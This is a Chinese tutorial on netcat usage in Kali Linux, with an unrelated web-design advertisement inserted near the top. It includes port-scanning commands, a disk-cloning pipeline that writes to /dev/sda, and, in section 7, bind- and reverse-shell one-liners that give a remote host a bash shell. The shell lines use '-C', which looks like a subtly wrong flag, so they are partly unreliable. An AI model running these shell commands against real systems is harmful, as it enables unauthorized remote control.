kali 工具NETCAT的使用方法，針對這個問題，這篇文章詳細介紹了相對應(yīng)的分析和解答，希望可以幫助更多想解決這個問題的小伙伴找到更簡單易行的方法。

在做網(wǎng)站、網(wǎng)站設(shè)計中從網(wǎng)站色彩、結(jié)構(gòu)布局、欄目設(shè)置、關(guān)鍵詞群組等細微處著手，突出企業(yè)的產(chǎn)品/服務(wù)/品牌，幫助企業(yè)鎖定精準(zhǔn)用戶，提高在線咨詢和轉(zhuǎn)化，使成都網(wǎng)站營銷成為有效果、有回報的無錫營銷推廣。創(chuàng)新互聯(lián)公司專業(yè)成都網(wǎng)站建設(shè)十余年了，客戶滿意度97.8%，歡迎成都創(chuàng)新互聯(lián)客戶聯(lián)系。

1.NETCAT作為客戶端常用的命令

nc -v verbose [use twice to be more verbose]

nc -n numeric-only IP addresses, no DNS

下列是nc的所有命令：  

nc -vn 123.125.50.29 110(POP3服務(wù)器的110端口)

nc -nv 202.181.12.12 25(SMTP服務(wù)器的25端口)

2.NC--傳輸文本信息

服務(wù)器：nc -l -p 端口號

客戶端：nc -nv 服務(wù)器的ip 端口號

應(yīng)用：遠程電子取證

ls -l的取證

ps aux的取證

3.nc文件/目錄傳輸

（1）文件傳輸

往服務(wù)器傳文件：

服務(wù)器：nc -ip 端口號 > 文件名

客戶端：nc -nv 服務(wù)器ip地址 端口號 < 文件名 -q 1

往客戶端傳文件：

服務(wù)器：nc -lp 端口號 < 文件名 -q 1

客戶端：nc -nv 服務(wù)器ip地址 端口號 > 文件名

2）目錄傳輸

也涉及雙向，和上述的文件傳輸類似

向客戶端發(fā)送文件目錄：

服務(wù)器：tar -cvf - 目錄名/ | nc -lp 端口號 -q 1

客戶端：nc -nv 服務(wù)器ip地址 端口號 | tar -xvf -

（3）加密傳文件

服務(wù)器：nc -lp 端口號 | mcrypt --flush -Fbqd -a rijndael-256 -m ecb > 文件名

客戶端：mcrypt --flush -Fbq -a rijndael-256 -m ecb < 文件名 | nc -nv ip地址 端口號-q 1

4.nc-流媒體服務(wù)

服務(wù)器：cat 文件名.mp4 | nc -lp 端口號

客戶端：nc -nv 服務(wù)器ip地址 端口號 | 播放器（mplayer） -vo x11 -cache 3000 -

5.nc--端口掃描

nc -nvz ip地址 端口范圍 //掃描TCP端口

nc -nvzu ip地址 端口范圍 //掃描UDP端口

每一個掃描器的掃描結(jié)果都不是特別準(zhǔn)確的，可以多使用幾種方式對端口進行掃描以增加準(zhǔn)確性

6.nc--遠程克隆硬盤

服務(wù)器：nc -lp 端口號 | dd of=/dev/sda

客戶端：dd if=/dev/sda | nc -nv 服務(wù)器ip地址 端口號 -q 1 

遠程電子取證，可以將目標(biāo)服務(wù)器硬盤遠程復(fù)制，或者內(nèi)存

7.nc--遠程控制

正向：服務(wù)器：nc -lp 端口 -C bash

           客戶端：nc -nv 服務(wù)器ip地址 端口

這樣可以使服務(wù)器獲得客戶端的一個bash

反向：服務(wù)器：nc -lp 端口

           客戶端：nc 服務(wù)器ip地址 端口 -C bash

這樣可以使客戶端獲得服務(wù)器的一個bash

nc缺乏加密和身份驗證的能力

關(guān)于kali 工具NETCAT的使用方法問題的解答就分享到這里了，希望以上內(nèi)容可以對大家有一定的幫助，如果你還有很多疑惑沒有解開，可以關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道了解更多相關(guān)知識。